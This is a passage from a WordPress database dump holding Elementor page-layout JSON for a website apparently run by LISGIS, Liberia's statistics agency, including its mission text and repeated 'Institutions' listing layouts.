ayout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bad4608\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6428a1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"db45cc0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48f7b3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bef4576\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"762ba4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89dda08\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"867bd0f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lisgis\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(16415,2475,'_thumbnail_id','2473'),(16418,2476,'_elementor_edit_mode','builder'),(16419,2476,'_elementor_template_type','wp-page'),(16420,2476,'_elementor_version','2.7.5'),(16421,2476,'_wp_page_template','default'),(16422,2476,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f5992e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"246311e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"24a1171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4052f33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions Categories\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f88d3c5\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"ca-sidebar-2450\"},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(16425,2477,'_elementor_edit_mode','builder'),(16426,2477,'_elementor_template_type','wp-page'),(16427,2477,'_elementor_version','2.7.5'),(16428,2477,'_wp_page_template','default'),(16429,2477,'_elementor_data','[{\"id\":\"36dca8c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"246311e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"51149f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0b2d2ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions Categories\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bb8d2bc\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"ca-sidebar-2450\"},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16431,2478,'_elementor_edit_mode','builder'),(16432,2478,'_elementor_template_type','wp-page'),(16433,2478,'_elementor_version','2.7.5'),(16434,2478,'_wp_page_template','default'),(16435,2478,'_elementor_data','[{\"id\":\"36dca8c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"246311e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"51149f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0b2d2ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions Categories\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(16437,2479,'_elementor_edit_mode','builder'),(16438,2479,'_elementor_template_type','wp-page'),(16439,2479,'_elementor_version','2.7.5'),(16440,2479,'_wp_page_template','default'),(16441,2479,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"